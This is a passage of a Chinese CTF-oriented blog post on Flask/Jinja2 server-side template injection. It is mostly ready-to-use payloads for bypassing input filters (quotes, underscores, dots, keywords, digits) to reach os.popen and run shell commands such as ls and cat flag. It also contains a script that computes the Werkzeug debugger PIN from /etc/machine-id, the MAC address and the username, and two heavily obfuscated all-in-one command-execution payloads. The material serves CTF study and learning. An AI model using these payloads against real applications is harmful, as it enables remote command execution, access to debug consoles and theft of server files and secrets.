<h3 id="单双引号的过滤绕过"><a href="#单双引号的过滤绕过" class="headerlink" title="单双引号的过滤绕过"></a>单双引号的过滤绕过</h3><ol>
<li><strong>request模块绕过</strong><br>flask框架下内置了request模块.可以用于获取get和post提交的数据,但是和直接在python中使用request略有不同<br><strong>get传参</strong><code>request.args.name</code>这边的name为参数名<br><strong>post传参</strong><code>request.form.name</code>这边的name为参数名<br><strong>cookie传参</strong><code>request.cookies.name</code>这边的name为参数名</li>
<li><strong>替换关键字</strong><br>在原本需要引号包裹,或是关键词被过滤时,可以将request放在原本的位置,然后再传入参数<br>例如(执行命令<code>ls</code>)<br><code>?name=&#123;%print(url_for.__globals__.os.popen(request.args.cmd).read())%&#125;&amp;cmd=ls</code><br>一般题目是get传参我们也使用get传参,题目是post传参我们也使用post传参,因为如果后端没开启的传参模式会报错<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230518210329.png" alt="cookie传参"></li>
</ol>
<h3 id="下划线的过滤绕过"><a href="#下划线的过滤绕过" class="headerlink" title="下划线的过滤绕过"></a>下划线的过滤绕过</h3><ol>
<li><p><strong>过滤器</strong><br>过滤器用过管道符(<code>|</code>)与变量连接,还可以有可选的参数,效果类似于将这个变量输入函数中,然后获取输出结果,过滤器的本质也就是函数,多个过滤器可以通过管道符连接使用(将一个过滤器的输出作为下一个过滤器的输入)<br>下面是flask中常见的过滤器<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230518210908.png"></p>
</li>
<li><p><strong>过滤器+request模块</strong><br>可以用attr()过滤器+request模块实现对下划线的绕过<br>例如<br><code>&#123;&#123;().__class__.__base__&#125;&#125;</code>等价于<code>&#123;&#123;()|attr('__class__')|attr('__base__')&#125;&#125;</code><br>配合<code>request</code>可以<br><code>?name=&#123;&#123;()|attr(request.args.cla)|attr(request.args.ba)&#125;&#125;&amp;cla=__class__&amp;ba=__base__</code></p>
</li>
<li><p><strong>编码绕过</strong><br><code>16进制编码</code>,用<code>\x5f</code>来代替下划线<code>_</code>,用<code>\x2e</code>代替小数点<code>.</code><br>例如<strong>paylaod</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config[<span class="string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>][<span class="string">&quot;\x5f\x5finit\x5f\x5f&quot;</span>][<span class="string">&quot;\x5f\x5fglobals\x5f\x5f&quot;</span>][<span class="string">&quot;os&quot;</span>][<span class="string">&quot;popen&quot;</span>](<span class="string">&quot;cat app\x2epy&quot;</span>)[<span class="string">&quot;read&quot;</span>]()&#125;&#125;</span><br></pre></td></tr></table></figure></li>
<li><p><strong>格式化字符串</strong><br><strong>payload</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()|attr(<span class="string">&quot;%c%cclass%c%c&quot;</span>%(<span class="number">95</span>,<span class="number">95</span>,<span class="number">95</span>,<span class="number">95</span>))&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>类似于这样的形式,不仅是下划线,关键字也可以采用这样的方式绕过</p>
</li>
<li><p><strong>取字符绕过</strong><br><code>&#123;%set xhx=(lipsum|string|list)[18]%&#125;</code>类似于这样的形式,在一个字符串中找到需要的那个字符,然后根据索引取到字符</p>
</li>
</ol>
<h3 id="点绕过"><a href="#点绕过" class="headerlink" title="点绕过"></a>点绕过</h3><ol>
<li><p>使用中括号<code>[]</code>绕过点<code>.</code><br>魔术方法和魔术方法之间的连接既可以用<code>.</code>,也可以用中括号,但是使用中括号必须用引号包裹字符串<br><code>&#123;&#123;().__class__.__base__&#125;&#125;</code>等价于<code>&#123;&#123;()["__class__"]["__base__"]&#125;&#125;</code></p>
</li>
<li><p>使用<code>attr</code>过滤器<br>和前面下划线绕过差不多,不再演示了</p>
</li>
</ol>
<h3 id="关键字绕过"><a href="#关键字绕过" class="headerlink" title="关键字绕过"></a>关键字绕过</h3><ol>
<li><p><strong>+拼接绕过</strong><br>最简单方法就是使用拼接<code>[&#39;glo&#39;+&#39;bals&#39;]</code>等价于<code>[&#39;globals&#39;]</code></p>
</li>
<li><p><strong>过滤器绕过</strong><br>前面介绍过的<code>reverse</code>反转过滤器<br>例如<code>&#123;%set a='__ssalc__'|reverse%&#125;&#123;&#123;a&#125;&#125;</code>,就是将<code>__ssalc__</code>逆序变成<code>__class__</code></p>
</li>
<li><p><strong>~拼接绕过</strong><br><strong>payload</strong><code>&#123;%set a="__cla"%&#125;&#123;%set b="ss__"%&#125;&#123;&#123;a~b&#125;&#125;</code></p>
</li>
<li><p><strong>其他</strong><br>类似于之前的编码绕过,格式化字符串,取字符绕过等方法也都是可以实现的,比较复杂,就不演示了</p>
</li>
</ol>
<h3 id="数字过滤"><a href="#数字过滤" class="headerlink" title="数字过滤"></a>数字过滤</h3><ol>
<li>Length过滤器绕过<br><strong>payload</strong><code>&#123;%set m='aaaaaaaaa'|length%&#125;&#123;&#123;m&#125;&#125;</code>这里的m为a的个数统计,为<code>9</code><br>可以配合加减乘除<br><code>&#123;%set m='aaaaaaaaaa'|length*'aa'|length%&#125;&#123;&#123;m&#125;&#125;</code>这边m等于9*2,为<code>18</code></li>
</ol>
<h3 id="config获取配置信息"><a href="#config获取配置信息" class="headerlink" title="config获取配置信息"></a>config获取配置信息</h3><p>flag有可能隐藏在<code>config</code>,无过滤的情况下可以直接<code>&#123;&#123;config&#125;&#125;</code>,或是<code>&#123;&#123;self.__dict__&#125;&#125;</code>查看配置信息<br>有时候有过滤,这时候可以利用内置函数或对象寻找被过滤的字符串<br>调用<code>current_app</code>相当于调用flask,绕一圈之后再使用config,效果和直接config是一样的<br><strong>payload</strong><br><code>&#123;&#123;url_for.__globals__['current_app']['con'+'fig']&#125;&#125;</code><br><code>&#123;&#123;get_flashed_messages.__globals__['current_app']['con'+'fig']&#125;&#125;</code></p>
<h3 id="过滤特殊符号"><a href="#过滤特殊符号" class="headerlink" title="过滤特殊符号"></a>过滤特殊符号</h3><p>利用flask内置函数和对象获取符号,就是前面提到的取字符绕过<br>主要思路就是使用<code>string</code>和<code>list</code>过滤器,将结果转化为字符串列表储存,然后通过索引调用需要的字符串<br><strong>payload</strong><code>&#123;&#123;(config|string|list)[编号]&#125;&#125;</code>,config换成任何一个内置函数或者对象都行</p>
<h3 id="dict和jion"><a href="#dict和jion" class="headerlink" title="dict和jion"></a>dict和jion</h3><ol>
<li><p><code>dict()</code>用来创建一个字典<br><code>&#123;%set a=dict(class=1)%&#125;&#123;&#123;a&#125;&#125;</code>  a为字典,键为<code>class</code>,值为<code>1</code></p>
</li>
<li><p><code>join</code> 将一个序列化中的参数值拼接成字符串<br><code>&#123;%set a=dict(__cla=1,ss__=1)|join%&#125;&#123;&#123;a&#125;&#125;</code>join过滤器可以将字典的键拼接,此时的<code>a=__class__</code><br>或是这样拼接<br><code>&#123;%set a=('_','_',dict(cla=a,ss=a)|join,'_','_')|join%&#125;&#123;&#123;a&#125;&#125;</code><br>这里的用到了两个join,前面的是将<code>cla</code>和<code>ss</code>拼接到一起,后面的join是将下划线和<code>class</code>拼接到一起</p>
</li>
</ol>
<h3 id="debug的pin码计算"><a href="#debug的pin码计算" class="headerlink" title="debug的pin码计算"></a>debug的pin码计算</h3><p>debug功能是开发人员在计算机程序中查找和修复错误的过程。在flask框架下可以把debug选项设置为Ture,即可开启debug,一般情况下,在功能完善后,需要把debug功能关闭,如果不把debug功能关闭,可能会带来一些安全问题</p>
<p>在程序报错后,会在浏览器中提供一个交互调试器提示输入pin码,输入正确的pin码后可以实现命令的交互,并且,pin码并不是随机生成的,而是根据一些参数计算出来的<br><img src="https://zhmblog-imgs.oss-cn-beijing.aliyuncs.com/%E5%9B%BE%E5%BA%93/20230519204426.png"></p>
<p>贴一个大佬的脚本计算pin码,其实原理就是,将原本计算pin码的过程复制下来,然后各个值自己控制</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> chain</span><br><span class="line"></span><br><span class="line">probably_public_bits = [</span><br><span class="line">    <span class="string">&#x27;flaskweb&#x27;</span>  <span class="comment"># 参数一username,在ect/passwd可以看到</span></span><br><span class="line">    <span class="string">&#x27;flask.app&#x27;</span>,  <span class="comment"># 参数二modname,默认为flask.app</span></span><br><span class="line">    <span class="string">&#x27;Flask&#x27;</span>,  <span class="comment"># 参数三getattr(app, &#x27;__name__&#x27;, getattr(app.__class__, &#x27;__name__&#x27;)),默认为Flask</span></span><br><span class="line">    <span class="string">&#x27;/usr/local/lib/python3.7/site-packages/flask/app.py&#x27;</span>  <span class="comment"># 参数四getattr(mod, &#x27;__file__&#x27;, None),要获取app.py的绝对路径</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">private_bits = [</span><br><span class="line">    <span class="string">&#x27;2485377864455&#x27;</span>,  <span class="comment"># 参数五str(uuid.getnode()), 在/sys/class/net/ens33/address可以看到(需要转化十进制),一般为eth0</span></span><br><span class="line">    <span class="string">&#x27;ad4fc7650590f81ec6ab4e3a40f284a6b5a75454fcb50d6ee5347eba94a124c8&#x27;</span>  <span class="comment"># 参数六get_machine_id(), 根据操作系统不同而不同,linux的是在/etc/machine-id可以看到</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">h = hashlib.md5()  <span class="comment">#这里根据python的版本不同也不同,2.7版本用的是sha1(),将这里的md5()改成sha1</span></span><br><span class="line"><span class="keyword">for</span> bit <span class="keyword">in</span> chain(probably_public_bits, private_bits):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(bit, <span class="built_in">str</span>):</span><br><span class="line">        bit = bit.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    h.update(bit)</span><br><span class="line">h.update(<span class="string">b&#x27;cookiesalt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cookie_name = <span class="string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="number">20</span>]</span><br><span class="line"></span><br><span class="line">num = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    h.update(<span class="string">b&#x27;pinsalt&#x27;</span>)</span><br><span class="line">    num = (<span class="string">&#x27;%09d&#x27;</span> % <span class="built_in">int</span>(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">rv = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(num) % group_size == <span class="number">0</span>:</span><br><span class="line">            rv = <span class="string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">                          <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(num), group_size))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        rv = num</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(rv)</span><br></pre></td></tr></table></figure>
<p><strong>注意!!!!!!!!</strong><br>使用这个脚本还需要注意一些其他问题,比如我们需要有文件包含漏洞,或是能ssti出一些内容,因为我们需要去各个路径下读取参数<br>由于第六个参数比较复杂,就先不详细介绍了,参数五根据操作系统也有变化,参数四有默认值<br><code>print(int(&#39;mc地址&#39;,16))</code>参数五的转化代码,把mac地址的<code>:</code>删了<br><a target="_blank" rel="noopener" href="https://mayi077.gitee.io/2020/04/17/GYCTF2020-FlaskApp/">参考1</a>,<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11036">参考2</a>,<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44214568/article/details/124125565">参考3</a></p>
<h1 id="超级无敌payload"><a href="#超级无敌payload" class="headerlink" title="超级无敌payload"></a>超级无敌payload</h1><p>为了绕过,故意写的很抽象,偶尔偶尔用的上吧,有时候用不上也不知道什么原因,可能是payload中的某些被过滤了</p>
<p>过滤了<code>下划线_</code>,<code>空格</code>,<code>单引号&#39;&#39;和双引号&quot;&quot;</code>,<code>数字</code>,<code>某些关键字</code>,<code>中括号[]</code>,<code>小数点.</code>,<code>\</code><br>可以考虑试一下下面这个payload,基本很难cat,因为小数点被过滤了比如<code>flag.txt</code>就cat不了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="built_in">set</span> nine=<span class="built_in">dict</span>(aaaaaaaaa=a)|join|count%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> eighteen=<span class="built_in">dict</span>(aaaaaaaaaaaaaaaaaa=a)|join|count%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> pop=<span class="built_in">dict</span>(po=a,p=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> xhx=(lipsum|string|<span class="built_in">list</span>)|attr(pop)(eighteen)%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> kg=(lipsum|string|<span class="built_in">list</span>)|attr(pop)(nine)%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> glo=(xhx,xhx,<span class="built_in">dict</span>(glo=a,bals=a)|join,xhx,xhx)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> ge=(xhx,xhx,<span class="built_in">dict</span>(get=a,item=a)|join,xhx,xhx)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> o=<span class="built_in">dict</span>(o=a,s=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> pope=<span class="built_in">dict</span>(po=a,pen=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> sys=<span class="built_in">dict</span>(ls=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> rea=<span class="built_in">dict</span>(re=a,ad=a)|join%&#125;</span><br><span class="line">&#123;&#123;lipsum|attr(glo)|attr(ge)(o)|attr(pope)(sys)|attr(rea)()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>基本思路就是,在<code>lipsum</code>模块中找字符代替下划线和空格,用<code>dict(aaaaaaaaa=a)|join|count</code>来获取数字,用<code>dict+join</code>法绕过关键字<br><code>sys</code>是最后要执行的命令,可以改成<br><code>&#123;%set (sys=dict(cat=a)|join,kg,dict(fl=a,ag=a)|join)join%&#125;</code>这段代码等于cat flag<br>如果过滤的少点还可以<br><code>&#123;%set (sys=dict(cat=a)|join,kg,'/',dict(f=a)|join,'*')join%&#125;</code>这段代码等于<code>cat /f*</code>获取根目录下所有f开头的文件(用了通配符)</p>
<p>下面这个payload过滤的没上面那么多,但是有时候比上面的更好用(不知道为啥,可能上面的代码多了更容易被过滤,比如<code>attr</code>)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;%<span class="built_in">set</span> xhx=(lipsum|string|<span class="built_in">list</span>)[<span class="number">18</span>]%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> kg=(lipsum|string|<span class="built_in">list</span>)[<span class="number">9</span>]%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> glo=(xhx,xhx,<span class="built_in">dict</span>(glo=a)|join,<span class="built_in">dict</span>(bals=a)|join,xhx,xhx)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> o=<span class="built_in">dict</span>(o=a,s=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> pope=<span class="built_in">dict</span>(po=a,pen=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> sys=<span class="built_in">dict</span>(ls=a)|join%&#125;</span><br><span class="line">&#123;%<span class="built_in">set</span> rea=<span class="built_in">dict</span>(re=a,ad=a)|join%&#125;</span><br><span class="line">&#123;&#123;lipsum[glo][o][pope](sys)[rea]()&#125;&#125;</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SSTI/" rel="tag"># SSTI</a>
              <a href="/tags/Python/" rel="tag"># Python</a>
              <a href="/tags/Flask/" rel="tag"># Flask</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/05/04/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%AD%A6%E4%B9%A0/" rel="prev" title="文件包含漏洞的学习">
      <i class="fa fa-chevron-left"></i> 文件包含漏洞的学习
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/05/23/buu%E5%88%B7%E9%A2%98%E4%B9%8Bsql%E6%B3%A8%E5%85%A5/" rel="next" title="buu刷题之sql注入">
      buu刷题之sql注入 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SSTI%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">SSTI简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Flask%E6%A1%86%E6%9E%B6%E4%B8%8B%E7%9A%84ssti"><span class="nav-number">2.</span> <span class="nav-text">Flask框架下的ssti</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#jinja2%E4%B8%AD%E7%9A%84ssti"><span class="nav-number">2.1.</span> <span class="nav-text">jinja2中的ssti</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="nav-number">2.1.1.</span> <span class="nav-text">相关魔术方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-number">2.1.2.</span> <span class="nav-text">危险函数的利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E6%89%BE%E5%8D%B1%E9%99%A9%E7%B1%BB"><span class="nav-number">2.1.3.</span> <span class="nav-text">脚本找危险类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E6%89%BE%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="nav-number">2.1.4.</span> <span class="nav-text">脚本找危险函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#OS%E6%A8%A1%E5%9D%97%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">2.1.5.</span> <span class="nav-text">OS模块执行命令</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E4%BA%9B%E6%8A%80%E5%B7%A7"><span class="nav-number">2.2.</span> <span class="nav-text">一些技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#war%E7%B1%BB%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.1.</span> <span class="nav-text">war类执行命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#importlib%E7%B1%BB%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.2.</span> <span class="nav-text">importlib类执行命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#linecache%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.3.</span> <span class="nav-text">linecache执行命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#subprocess-Popen%E7%B1%BB%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="nav-number">2.2.4.</span> <span class="nav-text">subprocess.Popen类执行命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8C%E8%8A%B1%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.5.</span> <span class="nav-text">双花括号过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%A0%E5%9B%9E%E6%98%BE%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.2.6.</span> <span class="nav-text">无回显盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">2.2.6.1.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%A6%E5%A4%96%E6%B3%A8%E5%85%A5"><span class="nav-number">2.2.6.2.</span> <span class="nav-text">带外注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.2.6.3.</span> <span class="nav-text">脚本盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%AD%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.7.</span> <span class="nav-text">中括号过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8D%95%E5%8F%8C%E5%BC%95%E5%8F%B7%E7%9A%84%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.8.</span> <span class="nav-text">单双引号的过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8B%E5%88%92%E7%BA%BF%E7%9A%84%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.9.</span> <span class="nav-text">下划线的过滤绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%82%B9%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.10.</span> <span class="nav-text">点绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E9%94%AE%E5%AD%97%E7%BB%95%E8%BF%87"><span class="nav-number">2.2.11.</span> <span class="nav-text">关键字绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E8%BF%87%E6%BB%A4"><span class="nav-number">2.2.12.</span> <span class="nav-text">数字过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#config%E8%8E%B7%E5%8F%96%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF"><span class="nav-number">2.2.13.</span> <span class="nav-text">config获取配置信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%87%E6%BB%A4%E7%89%B9%E6%AE%8A%E7%AC%A6%E5%8F%B7"><span class="nav-number">2.2.14.</span> <span class="nav-text">过滤特殊符号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dict%E5%92%8Cjion"><span class="nav-number">2.2.15.</span> <span class="nav-text">dict和jion</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#debug%E7%9A%84pin%E7%A0%81%E8%AE%A1%E7%AE%97"><span class="nav-number">2.2.16.</span> <span class="nav-text">debug的pin码计算</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%B6%85%E7%BA%A7%E6%97%A0%E6%95%8Cpayload"><span class="nav-number">3.</span> <span class="nav-text">超级无敌payload</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="R0ot"
      src="/images/hearder.jpg">
  <p class="site-author-name" itemprop="name">R0ot</p>
  <div class="site-description" itemprop="description">天地不仁,以万物为刍狗</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">R0ot</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">89k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">5:18</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>-->




        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>

